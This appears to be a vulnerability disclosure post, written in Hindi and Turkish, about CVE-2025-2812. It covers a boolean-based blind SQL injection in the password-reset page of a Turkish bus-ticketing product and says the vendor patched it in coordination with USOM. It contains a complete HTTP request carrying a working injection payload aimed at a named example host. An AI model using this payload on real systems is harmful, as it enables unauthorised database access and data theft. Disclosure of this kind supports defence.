
CVE-2025-2812 SQL इंजेक्शन
📌 CVE-ID: CVE-2025-2812
📢 USOM घोषणा: tr-25-0099
🛡️ भेद्यता प्रकार: CWE-89 - SQL इंजेक्शन (Boolean-based Blind)
🏢 प्रभावित उत्पाद: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 नमूना लक्ष्य URL:https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
"Bilet Satış Otomasyonu" उत्पाद में, पासवर्ड रीसेट (SifremiUnuttum.php) पेज पर "Adınızın ilk harfi" (ilkHarf) पैरामीटर में Boolean-based Blind SQL Injection भेद्यता पाई गई है। यह भेद्यता उपयोगकर्ता नाम या पासवर्ड के बिना सिस्टम से डेटा लीक करने की अनुमति देती है।
यह भेद्यता निम्नलिखित बस कंपनियों के सिस्टम को कवर करती है:
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
ilkHarf"Mydata Bilişim Ltd. Şti" द्वारा विकसित "Bilet Satış Otomasyonu" उत्पाद में हमारे द्वारा पाई गई भेद्यता के बाद, CVE-2025-2812 कोड के साथ घोषित यह खामी निर्माता और USOM के समन्वय से जारी की गई है। इस प्रक्रिया में साइबर सुरक्षा समुदाय में योगदान देकर हमें गर्व है।
भेद्यता की सूचना के बाद, Mydata Bilişim Ltd. Şti ने सभी आवश्यक प्रक्रियाओं को शीघ्रता से लागू किया, संबंधित सुरक्षा खामी को बंद किया और अपने सिस्टम में अतिरिक्त सुरक्षा उपायों को एकीकृत किया। प्रक्रिया में दिखाई गई पारदर्शिता, सहयोग और जिम्मेदारी की भावना के लिए हम उनका धन्यवाद करते हैं।
इस प्रक्रिया में साइबर सुरक्षा समुदाय में योगदान देकर हमें गर्व है।
किसी भी प्रश्न, प्रतिक्रिया या सहयोग के लिए मुझसे संपर्क कर सकते हैं: